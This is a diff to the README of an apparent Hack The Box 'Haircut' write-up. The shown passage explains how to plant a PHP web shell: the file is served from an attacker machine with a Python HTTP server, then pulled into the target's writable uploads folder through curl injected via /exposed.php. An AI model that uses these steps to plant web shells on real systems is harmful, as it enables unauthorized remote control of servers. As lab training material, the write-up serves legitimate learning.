notsag-dev/htb-haircut/README.md

 drwxr-xr-x 2 www-data www-data 4.0K May 22  2017 uploads
 ```

-It seems `uploads` may be a good place where to place a web shell.
+It seems `uploads` may be a good place to place a web shell as `www-data` has write permissions on it.
 I'm going to use a PHP web shell called `Predator.php` present in this repo https://github.com/JohnTroony/php-webshells.git.
+Note that I use that one because I wanted to check it out, but other much simpler ones would be enough.

-The first step is to make the shell "curleable" by exposing it through an http server in the attacker:
+The first step to copy the shell into the target server, is to make the shell "curleable" by exposing it through an http server in the attacker:
 ```
 $ cd php-webshells
 $ python -m SimpleHTTPServer
 Serving HTTP on 0.0.0.0 port 8000 ...
 ```

-And now from the input in `/exposed.php` we curl it to uploads leveraging the `-o` (output file) flag (this time without the trick to execute commands from the input as we are just using curl as it is to fetch the shell):
+And now from `/exposed.php` we curl it sending the file to `/uploads` leveraging the `-o` (output file) flag:
 ```
 10.10.14.23:8000/Predator.php -o uploads/Predator.php
 ```